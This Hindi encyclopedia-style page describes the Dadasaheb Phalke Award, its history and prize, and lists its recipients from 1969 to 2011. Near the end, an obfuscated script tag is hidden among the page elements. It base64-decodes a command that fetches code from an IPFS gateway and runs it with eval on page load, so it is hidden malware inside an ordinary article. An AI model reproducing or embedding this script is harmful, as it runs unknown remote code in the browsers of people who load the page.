दादा साहब फाल्के पुरस्कार

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
दादा साहब फाल्के पुरस्कार

दादा साहब फाल्के पुरस्कार की स्थापना वर्ष 1969 में भारतीय सिनेमा के पितामह दादा साहब फाल्के की सौंवीं जयंती के अवसर पर की गई थी। यह भारतीय सिनेमा का सबसे बड़ा पुरस्कार है, जो आजीवन योगदान के लिए केंद्र सरकार की ओर से दिया जाता है। भारत सरकार द्वारा यह पुरस्कार भारतीय सिनेमा के संवर्धन और विकास में उल्लेखनीय योगदान करने के लिए दिया जाता है।

  • 'लाइफ टाईम अचीवमेंट अवार्ड' के रूप में दिया जाने वाला 'दादा साहेब फाल्के पुरस्कार' भारत के फ़िल्म क्षेत्र का सबसे प्रतिष्ठित पुरस्कार है।
  • प्रतिष्ठित व्यक्तियों की एक समिति की सिफारिशों पर यह पुरस्कार प्रदान किया जाता है।
  • वर्ष 1969 में पहला पुरस्कार अभिनेत्री देविका रानी को दिया गया था।
  • यह पुरस्कार वर्ष के अंत में राष्ट्रीय फ़िल्म पुरस्कारों के साथ दिया जाता है। लेकिन वर्ष 2006 में बंबई हाई कोर्ट ने फ़िल्म महोत्सव निदेशालय को निर्देश दिया कि वह इस सम्मान के लिए बिना सेंसर की हुई फ़िल्मों पर ही विचार करे। इसे फ़िल्म महोत्सव निदेशालय ने सर्वोच्च न्यायालय में चुनौती दी और सर्वोच्च न्यायालय का फैसला फ़िल्म महोत्सव निदेशालय के पक्ष में रहा। अदालती फैसले में देरी के कारण उस वर्ष के पुरस्कार की घोषणा वर्ष 2008 के मध्य में की गई।
  • 2007 के पुरस्कार की घोषणा[1] सिंतबर, 2009 में हुई और इसी तरह वर्ष 2008 के पुरस्कार की 19 जनवरी, 2010 को तथा वर्ष 2009 के पुरस्कार की घोषणा नौ सितंबर, 2010 को हुई।
  • इस पुरस्कार में भारत सरकार की ओर से दस लाख रुपये नकद, स्वर्ण कमल और शॉल प्रदान किया जाता है।
  • वर्ष 2008 का 'दादा साहेब फाल्के पुरस्कार' कर्नाटक के वी.के. मूर्ति को प्रदान किया गया था, जो इस प्रतिष्ठित पुरस्कार को पाने वाले पहले सिनेमैटोग्राफर थे।
  • ‘दादा साहेब फाल्के अकेडमी’ के द्वारा भी दादा साहेब फाल्के के नाम पर तीन पुरस्कार दिए जाते हैं, जो हैं - फाल्के रत्न अवार्ड, फाल्के कल्पतरु अवार्ड और दादा साहेब फाल्के अकेडमी अवार्ड्स।
दादा साहब फाल्के पुरस्कार से सम्मानित
क्रम वर्ष कलाकार कार्यक्षेत्र चित्र
1- 1969 देविका रानी अभिनेत्री
Devika-Rani.jpg
2- 1970 बी. एन. सरकार फ़िल्म निर्माता
B.N.Sircar.jpg
3- 1971 पृथ्वीराज कपूर अभिनेता ( मरणोपरांत)
Prithviraj-Kapoor-2.jpg
4- 1972 पंकज मलिक फ़िल्म संगीतकार
Pankaj-Malik.jpg
5- 1973 रूबी मेयर्स / सुलोचना अभिनेत्री
Sulochana.jpg
6- 1974 बोमिरेड्डी नरसिम्हा रेड्डी फ़िल्म निर्देशक
7- 1975 धीरेन्द्र नाथ गांगुली अभिनेता, फ़िल्म निर्देशक
8- 1976 कानन देवी अभिनेत्री
Kanan-Devi.jpg
9- 1977 नितिन बोस फ़िल्म छायाकार, फ़िल्म निर्देशक, फ़िल्म पटकथा लेखक
10- 1978 रायचंद बोराल फ़िल्म संगीतकार, फ़िल्म निर्देशक
R-C-Boral.jpg
11- 1979 सोहराब मोदी अभिनेता, फ़िल्म निर्देशक, फ़िल्म निर्माता
Sohrab-Modi.jpg
12- 1980 पी. जयराज अभिनेता, फ़िल्म निर्देशक चित्र:
Jairaj.jpg
13- 1981 नौशाद अली फ़िल्म संगीतकार
Naushad.jpg
14- 1982 एल. वी. प्रसाद अभिनेता, फ़िल्म निर्देशक, फ़िल्म निर्माता
15- 1983 दुर्गा खोटे अभिनेत्री
Durga-khote-2.jpg
16- 1984 सत्यजित राय फ़िल्म निर्देशक
Satyajit-Ray.jpg
17- 1985 वी शांताराम अभिनेता, फ़िल्म निर्देशक, फ़िल्म निर्माता
V-Shantaram.jpg
18- 1986 बी. नागी रेड्डी फ़िल्म निर्माता
19- 1987 राजकपूर अभिनेता, फ़िल्म निर्देशक
Raj-Kapoor.jpg
20- 1988 अशोक कुमार अभिनेता
Ashok Kumar.jpg
21- 1989 लता मंगेशकर पार्श्व गायिका
Lata-Mangeshkar-1.jpg
22- 1990 ए. नागेश्वर राव अभिनेता
23- 1991 भालजी पेंढारकर फ़िल्म निर्देशक, फ़िल्म निर्माता, फ़िल्म पटकथा लेखक
24- 1992 भूपेन हज़ारिका फ़िल्म निर्देशक, गायक
Bhupen Hazarika.jpg
25- 1993 मजरूह सुल्तानपुरी गीतकार
Majrooh Sultanpuri.gif
26- 1994 दिलीप कुमार अभिनेता
Dilip-kumar.jpg
27- 1995 राजकुमार अभिनेता
Rajkumar-sounth-indian-actor.jpg
28- 1996 शिवाजी गणेशन अभिनेता
Shivaji-ganeshan.jpg
29- 1997 प्रदीप गीतकार
Pradeep.jpg
30- 1998 बी. आर. चोपड़ा फ़िल्म निर्देशक, फ़िल्म निर्माता
B.R.-Chopra.jpg
31- 1999 ऋषिकेश मुखर्जी फ़िल्म निर्देशक
Hrishikesh-mukherjee.jpg
32- 2000 आशा भोंसले पार्श्व गायिका
Asha-Bhosle.jpg
33- 2001 यश चोपड़ा फ़िल्म निर्देशक, फ़िल्म निर्माता
Yash-chopra-.jpg
34- 2002 देव आनंद अभिनेता, फ़िल्म निर्देशक, फ़िल्म निर्माता
Dev anand young.jpg
35- 2003 मृणाल सेन फ़िल्म निर्देशक
Mrinal-sen.jpg
36- 2004 अदूर गोपालकृष्णन फ़िल्म निर्देशक
37- 2005 श्याम बेनेगल फ़िल्म निर्देशक
Shyam Benegal.jpg
38- 2006 तपन सिन्हा फ़िल्म निर्देशक
Tapan-sinha.jpg
39- 2007 मन्ना डे पार्श्व गायक
Manna Dey.jpg
40- 2008 वी.के. मूर्ति छायाकार
V.K.Murthy.jpg
41- 2009 डी. रामानायडू फ़िल्म निर्माता
D-Ramanaidu.jpg
42- 2010 के. बालाचंदर फ़िल्म निर्देशक
K.Balachander.jpg
43- 2011 सौमित्र चटर्जी अभिनेता
Saumitra-Chatterjee.jpg


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. 2008 के अंत में होनी चाहिए थी

बाहरी कड़ियाँ

संबंधित लेख